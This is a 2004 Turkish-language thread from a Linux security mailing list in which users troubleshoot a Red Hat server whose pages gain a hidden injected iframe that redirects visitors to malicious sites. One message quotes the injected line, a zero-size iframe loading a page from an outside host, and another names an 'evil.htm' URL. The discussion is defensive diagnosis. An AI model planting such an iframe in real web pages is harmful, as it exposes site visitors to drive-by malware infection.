From: Serdar KOYLU (serdar@uludag.org.tr)
Date: Fri 15 Oct 2004 - 13:31:26 EEST
Selamlar..
Basit bir cevabı vardır mutlaka. İhtimal, biri aletinizi hacklemiş,
Apache'ye modüle vs. olarak bu işi yapan bir şey eklemiştir.
RedHat ile böyle bir şeyin başınıza gelmesi, Windows kadar değilse bile,
büyük bir ihtimaldir. Defaten deriz ki, RedHat kullanmamak faideli bir
tavirdir her daim..
Bu arada konu kesinlikle bir virüs vakası değil. Bunu da söyleyelim.
Diğer yandan, wget ile sayfayı alırsanız bu durum yaşanmazken, curl ile
alırsanız gerçekleşiyor. Demekki browser seçebilen bir mekanizma
kullanmışlar.
Apache'ye silin. Sonra yeniden kurun. Ama bu sizin hacklenmenize sebep
olan açığı kapatmaz, önce bunu bulup kapatın derim.
Saygı ve sevgiler..
> Evet ama burda asil problemim index.html sayfasinin kaynaginda olamayan bi
> <iframe> satirini index.html'i cagirdigim zaman eklemesi.
>
> Haliyle cagardigim sayfalarin hepsi bi yerlere yonleniyor. Bilgisayarima
> virus bulastirmaya calisiyor.
>
> Peki icinde <iframe> tagini bulundurmayan index.html dosyasi nasil ben
> cagirdigimda duzenlenip icine <iframe> ekleniyor.
>
> -----Original Message-----
> From: linux-guvenlik-bounces@liste.linux.org.tr
> [mailto:linux-guvenlik-bounces@liste.linux.org.tr] On Behalf Of Ugur
> Sent: Friday, October 15, 2004 12:09 PM
> To: linux-guvenlik@liste.linux.org.tr
> Subject: Re: Windos'a yine virüs bulaşmış (Eskikonu : RE: [Linux-guvenlik]
> redhat 9'a virus bulasmis.)
>
> On Friday 15 October 2004 11:12, enginaar© wrote:
> > IE kullanmiosan sen goremio olabilirsin scriptin calistirildiginiz cunku
> > IE'nin bir acigi sayesinde script bilgisayarına dosya yukleyip onu
> > calistirabiliyor.
>
> >
> > Buradaki sorun Linux makine siteyi gireni baska yerlere de yonlendiriyor.
> > Bunun her browser'da status barda gorulebiliyor olması lazım.
>
> >Siteyi şu anda Konqueror ile açtığımda http://xpire.info/fa/evil.htm
> sayfasını da açtı.Ve daha önce ki mesajımda Firefox ile
> <iframe src="http://www.splitinfinity.info/fa/?d=get" width=0
> > height=0></iframe> <style> * { font-family: verdana; font-size: 10pt;
> > COLOR: gray; }
> > b { font-weight: bold; }
>
> Bu bölümleri göremediğimi söylemiştim ancak Konqueror ile
> görebildim.Bilmediğim bir şeyler varsa bağışlayın. :)
> >Uğur
> >
> > -----Original Message-----
> > From: linux-guvenlik-bounces@liste.linux.org.tr
> > [mailto:linux-guvenlik-bounces@liste.linux.org.tr] On Behalf Of Devrim
> > GUNDUZ
> > Sent: Friday, October 15, 2004 10:56 AM
> > To: linux-guvenlik@liste.linux.org.tr
> > Subject: Windos'a yine virüs bulaşmış (Eski konu : RE: [Linux-guvenlik]
> > redhat 9'a virus bulasmis.)
> >
> >
> > Merhaba,
> >
> > On Fri, 15 Oct 2004, enginaar© wrote:
> > > Evet Saroz-life.com'a bende baktim bi problem cikmadi da
> >
> > www.cozumteknik.com
> >
> > > veya www.netdizayn.net adreslerine bi bakabilirsin. Bi de sayfaya
> >
> > girdiginde
> >
> > > altta status barda yazan adreslere dikkat edebilirsin. Bana da bu olay
> > > sikayet olarak geldi. Sizin server'daki domainlere girdigimde norton
> > > virus var diyor dediler. Sizin bilgisayarda vardir bisey dedim. Ben de
> >
> > sistemimin
> >
> > > temiz olduguna eminim. Bi kac siteye girdim, problem cikmadi ama
> > > cozumteknik.com a girdim, hemen exploit mexploit biseyler dedi.
> >
> > Masaüstünde Windows kullanan bir kişinin zor anları gibi geliyor bana
> > bunlar. Ha eminim ki sitelerin hitleri arttı bu arada. Bir sorun
> > gözükmüyor. Sanırım yine bir Mikisoft virüsü (kendisi başlıbaşına bir
> > virüs zaten) ortalarda ve bu sorun çıkıyor gibi.
> >
> > Bir de "virüs" olmaz Linux sunucuda; ancak eğer bir kişi sunucuya virüslü
> > bir dosya yüklemiş ve karşıdaki kişi de onu indirmeye çalışıyorsa o zaman
> > ayrı ama sorun Linux ile ilgili değil.
> >
> > Saygılar,
> > --
> > Devrim GUNDUZ
> > devrim~gunduz.org devrim.gunduz~linux.org.tr
> > http://www.tdmsoft.com
> > http://www.gunduz.org
> >
> > _______________________________________________
> > Linux-guvenlik mailing list
> > Linux-guvenlik@liste.linux.org.tr
> > http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
>
> _______________________________________________
> Linux-guvenlik mailing list
> Linux-guvenlik@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik